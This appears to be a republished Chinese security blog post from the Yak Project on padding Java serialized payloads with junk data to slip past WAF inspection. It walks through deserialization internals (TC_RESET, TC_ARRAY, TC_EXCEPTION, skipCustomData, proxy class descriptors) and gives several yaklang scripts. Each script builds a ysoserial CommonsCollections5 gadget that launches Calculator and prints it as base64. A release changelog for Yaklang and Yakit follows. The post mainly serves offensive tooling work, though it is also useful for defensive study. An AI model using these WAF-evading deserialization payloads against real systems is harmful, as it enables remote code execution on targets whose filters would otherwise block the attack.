Java 脏数据填充探索

admin 2024年3月22日19:17:25评论6 views字数 8022阅读26分44秒阅读模式

Java 脏数据填充探索

Java 脏数据填充探索

前言

有师傅提出了 Yso JavaHack 的生成序列化payload需要填充脏数据的需求,由于yak引擎没有java环境,所以不能直接对gadget封装,只能对数据化流操作,记录下分析过程。

什么是脏数据

Java 脏数据填充探索

什么是脏数据,为什么需要填充脏数据?先说脏数据的作用是绕过WAF的检查,那WAF是如何检查payload的?

可能是查aced头,可能是查关键字符串,或其它特征信息。再说一些waf可能存在的难点:如果请求体过大,可能会分段传输,需要对tcp报文重组,再解析为http请求后分析。如果重组后的包过大,可能由于性能问题放弃分析,或者由于数据太多,等待超时没有收到完整tcp报文放弃分析,这时可能只会对前几个报文进行特征匹配,利用此特点可以进行绕过。

如果是查aced头这种无差别拦截,那payload就没什么变形法子了,但如果查关键词,主要也就是一些gadget常用的类名,那可以想办法在不影响序列化流解析的前提下,在类名前塞一些数据,将实际生效的payload放在后面,绕过WAF检查。

寻找slot

Java 脏数据填充探索

Java序列化数据是一种格式化数据,不能无脑插入脏数据,需要找到一种合法方式在不影响序列化流正常解析的情况下塞脏数据。

从开发角度思考,可能存在塞脏数据的点可能有:

  1. 循环读数据流,跳过一些无意义、占位的数据或坏的数据块,如:

do{    b = reader.ReadByte()}while(b == 0x00)
  1. 递归解析数据流,前面可以塞任意数据,只要最后一次反序列化成功就ok,例如

func readObject(stream) {    flag = stream.readByte()    ....    readObject(stream)}

读一下ObjectInputStream的流程,重点看一下可能塞脏数据的逻辑,发现了几个可利用的位置。

Append脏数据

Java 脏数据填充探索

反序列化是从流中读取数据,当解析出一个完整对象就会结束反序列化流程。所以最简单暴力的方法就是直接append脏数据,但缺点是只能加到payload后,如果WAF只查前几个TCP报文,还是会被查。

TC_RESET

Java 脏数据填充探索

在readObject0方法中看到这样一段代码

byte tc;while ((tc = bin.peekByte()) == TC_RESET) {    bin.readByte();    handleReset();}

这段代码可以理解为忽略所有TC_RESET,并调用handleReset,handleReset的作用是清空handle表,在序列化刚开始时清空handle表是没有影响的。这段代码运行在readObject0的开头,所以可以理解为忽略序列化数据前的所有TC_RESET

使用yak编写一段脚本验证猜想,成功弹出计算器。

serIns = yso.GetCommonsCollections5JavaObject("open /System/Applications/Calculator.app")~payload = yso.ToBytes(serIns)~dirtyData = ""for range 100{    dirtyData += "x79"}res = string(payload[:4]) + dirtyData+ string(payload[4:])println(codec.EncodeBase64(res))

TC_ARRAY

Java 脏数据填充探索

readObject0的执行流程是先读对象类型,再根据类型采取不同的处理方式,如类型为ARRAY使用readArray处理。readArray的执行流程是,读classDesc,读长度,创建数组,根据数组长度,循环readObject读取数组元素。

所以只要在payload前加一个array头就可以随便塞垃圾数据了,再将gadget作为最后一个元素,所以最终的payload类似这种:[]Object{null,null,null,........,gadget}

在构造payload前需要准备一下:

  1. 构造classDesc

用java代码生成一个序列化的Object[]对象:rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwcA==

编写yaklang脚本读取其中的classDesc

objArrayIns = yso.GetJavaObjectFromBytes(codec.DecodeBase64("rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwcA==")~)~descSer = yso.ToBytes(objArrayIns.JavaSerializable.ClassDesc)~
  1. 数组长度

这是java源码:

public final int readInt() throws IOException {    int ch1 = in.read();    int ch2 = in.read();    int ch3 = in.read();    int ch4 = in.read();    if ((ch1 | ch2 | ch3 | ch4) < 0)        throw new EOFException();    return ((ch1 << 24) + (ch2 << 16) + (ch3 << 8) + (ch4 << 0));}

数组长度是一个int,占4个字节,使用大端存储,测试时可以暂时使用b"x00x00x00x02"。

编写脚本:

objArrayIns = yso.GetJavaObjectFromBytes(codec.DecodeBase64("rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwcA==")~)~descSer = yso.ToBytes(objArrayIns.JavaSerializable.ClassDesc)~serIns = yso.GetCommonsCollections5JavaObject("open /System/Applications/Calculator.app")~payload = yso.ToBytes(serIns)~dirtyData = ""dirtyData += "x75"// TC_ARRAYdirtyData += string(descSer[4:]) // 去掉magic headerdirtyData += "x00x00x00x02" // 数组长度是2res = string(payload[:4]) + dirtyData+ string(payload[4:])println(codec.EncodeBase64(res))

在验证payload时发现报错:

Exception in thread "main" java.lang.ClassCastException: java.io.ObjectStreamClass cannot be cast to java.lang.String

出现错误的位置在读取REFERENCE处,对读取到的handle强转为String出错。

case TC_REFERENCE:    return (String) readHandle(false);

怀疑是因为加了classdesc导致handle table错乱了,断点调试下发现本应取到6号元素,但取到了5号元素。

Java 脏数据填充探索

在前面介绍TC_RESET时提到过,TC_RESET作用是清空handle table,所以可以在gadget前加一个TC_RESET

但又出错了,因为handleReset验证了层数,也就是gadget必须在第一层:

private void handleReset() throws StreamCorruptedException {    if (depth > 0) {        throw new StreamCorruptedException(            "unexpected reset; recursion depth: " + depth);    }    clear();}

通过查找clear函数,发现在readFatalException时先调用了clear,再readObject0,刚好符合条件。所以可以在Gadget前加一个TC_EXCEPTION,将Gadget作为Exception解析,在解析前会清空handle table,最后脚本如下,成功弹计算器。

objArrayIns = yso.GetJavaObjectFromBytes(codec.DecodeBase64("rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwcA==")~)~descSer = yso.ToBytes(objArrayIns.JavaSerializable.ClassDesc)~serIns = yso.GetCommonsCollections5JavaObject("open /System/Applications/Calculator.app")~payload = yso.ToBytes(serIns)~dirtyData = ""dirtyData += "x75"// TC_ARRAYdirtyData += string(descSer[4:]) // 去掉magic headerdirtyData += "x00x00x00x02" // 数组长度是2dirtyData += "x7B"res = string(payload[:4]) + dirtyData+ string(payload[4:])println(codec.EncodeBase64(res))

但缺点是解析的对象会强转为IOException并抛出,控制台不太好看。

skipCustomData

Java 脏数据填充探索

在readNonProxyDesc时先解析了classDesc,再调用了skipCustomData方法,skipCustomData方法中调用了readObject0,思路和前面分析的 "递归解析数据流" 相同。也就是说,可以在gadget前随便塞classDesc,不影响gadget解析。

编写一段脚本验证,发现还是解析handle出错,和构造TC_ARRAY时的情况类似,加了个TC_EXCEPTION标记后成功弹计算器

objArraySer = codec.DecodeBase64("rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwcA==")~objArrayIns = yso.GetJavaObjectFromBytes(objArraySer)~descSer = yso.ToBytes(objArrayIns.JavaSerializable.ClassDesc)~serIns = yso.GetCommonsCollections5JavaObject("open /System/Applications/Calculator.app")~payload = yso.ToBytes(serIns)~dirtyData = ""dirtyData += string(descSer[4:-2]) // 去掉magic header、super class和bolck enddirtyData += string(descSer[4:-2]) // 塞两个试试dirtyData += "x7b"res = string(payload[:4]) + dirtyData+ string(payload[4:])println(codec.EncodeBase64(res))

上面脚本中需要注意的是classDesc在dump出来后,最后一个字符是class的父类,这里是TC_NULL,倒数第二个字符是块结束符,这里是TC_ENDBLOCKDATA,需要去掉。

在解析classDesc的代码中还可以看到,如果未从jvm找到对应的class,会抛出ClassNotFoundException异常并被捕获,在完成对象解析后才会抛出。

所以classDesc的类名字段等信息都是可以随便写的,这里在类名中塞脏数据试一下,如下把类名设为长度为10000的随机字符串,也可以成功。

objArraySer = codec.DecodeBase64("rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwcA==")~objArrayIns = yso.GetJavaObjectFromBytes(objArraySer)~objArrayIns.JavaSerializable.ClassDesc.Detail.ClassName=str.RandStr(10000)descSer = yso.ToBytes(objArrayIns.JavaSerializable.ClassDesc)~serIns = yso.GetCommonsCollections5JavaObject("open /System/Applications/Calculator.app")~payload = yso.ToBytes(serIns)~dirtyData = ""dirtyData += string(descSer[4:-2])dirtyData += "x7b"res = string(payload[:4]) + dirtyData+ string(payload[4:])println(codec.EncodeBase64(res))

再看skipCustomData函数除了readObject0,还循环调用了skipBlockData,明显是用来跳过数据块的,所以猜测可以在原本gadget的classDesc后加几个数据块,在反序列化时会自动跳过,完全不影响正常解析,但可能gadget第一层的class被WAF标记,所以还是要在gadget前加一个classDesc。

再写个脚本测试下:

objArraySer = codec.DecodeBase64("rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwcA==")~objArrayIns = yso.GetJavaObjectFromBytes(objArraySer)~descSer = yso.ToBytes(objArrayIns.JavaSerializable.ClassDesc)~serIns = yso.GetCommonsCollections5JavaObject("open /System/Applications/Calculator.app")~payload = yso.ToBytes(serIns)~dirtyData = ""dirtyData += string(descSer[4:-2]) // 掐magic header,去end block data和super class的尾dirtyData += "x77"  // TC_BLOCKDATAdirtyData += "x05" // 数据块大小dirtyData += string([]byte{1,2,3,4,5}) // 脏数据dirtyData += "x7b"res = string(payload[:5]) + dirtyData+ string(payload[4:])println(codec.EncodeBase64(res))

TC_PROXYCASSDESC

Java 脏数据填充探索

在解析proxyClassDesc时会先解析代理头,再继续解析class。所以可以给gadget加个代理头,而代理头可以无限塞接口名。

serIns = yso.GetCommonsCollections5JavaObject("open /System/Applications/Calculator.app")~payload = yso.ToBytes(serIns)~newPayload = ""newPayload += string(payload[:5]) // aced 和 TC_OBJECTnewPayload += string("x7d")newPayload += string("x00x00x00x01") // 1个interfacenewPayload += string("x00x02") // 长度是2newPayload += "aa" // 一个接口名叫aa(会查找aa class)newPayload += "x7b"newPayload += string(payload[4:]) // classDataprintln(codec.EncodeBase64(newPayload))

总结

Java 脏数据填充探索

TC_RESET是最简单的,适合临时测试时手工加,而且对解析流程影响不大,但大量的TC_RESET在aced流中特征挺明显的。

handle table错乱的问题可以暂时用x7b解决,但会抛出异常。除此外也可以把所有引用值重新生成,或将所有的引用都改为实例来解决。当然如果是用java自动生成的序列化流就不会有这问题。

Java更新迭代了这么多版本,为了兼容性,不可避免的做一些兼容处理,除了上述的方式应该还有很多办法,但贵不在多,目前觉得比较好用的是外面包一层TC_ARRAY,生成的payload是标准序列化流,兼容性最好,后面会在Yso JavaHack中采用这种方式塞脏数据。

参考:

https://mp.weixin.qq.com/s/wvKfe4xxNXWEgtQE4PdTaQ

https://y4tacker.github.io/2022/02/05/year/2022/2/%E5%AF%B9Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%95%B0%E6%8D%AE%E7%BB%95WAF%E6%96%B0%E5%A7%BF%E5%8A%BF%E7%9A%84%E8%A1%A5%E5%85%85/

END

更新日志

Yaklang  1.3.1-sp5

1. 修复内置插件的不合理写法和SSA提示

2. Web Fuzzer 新增参数替换功能

3. 修复 MITM 对下游代理的不恰当处理

4. 修复 nuclei 调试的 BUG

5. 修复动态标签的 BUG

6. 修复了一个循环体定义域在并发情况下的不恰当处理

7. 优化了可变参数情况下的代码补全行为

Yakit  1.3.1-sp4

1. 端口扫描UI升级

2. 端口扫描新增参数JS SSA解析,修复扫描时cpu飙升问题

3. WebFuzzer新增cookie、get参数、post参数、header配置

4. History优化染色展示

5. 菜单栏增加渲染fuzztag功能

6. 启动MITM后可选择收起侧边栏

7. 数据包缓存美化状态,且美化加入header

8. Webfuzzer请求增加美化功能

  YAK官方资源

Yak 语言官方教程:
https://yaklang.com/docs/intro/
Yakit 视频教程:
https://space.bilibili.com/437503777
Github下载地址:
https://github.com/yaklang/yakit
Yakit官网下载地址:
https://yaklang.com/
Yakit安装文档:
https://yaklang.com/products/download_and_install
Yakit使用文档:
https://yaklang.com/products/intro/
常见问题速查:
https://yaklang.com/products/FAQ

Java 脏数据填充探索
长按识别添加工作人员
开启Yakit进阶之旅

Java 脏数据填充探索

原文始发于微信公众号(Yak Project):Java 脏数据填充探索

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月22日19:17:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Java 脏数据填充探索https://cn-sec.com/archives/2595947.html

发表评论

匿名网友 填写信息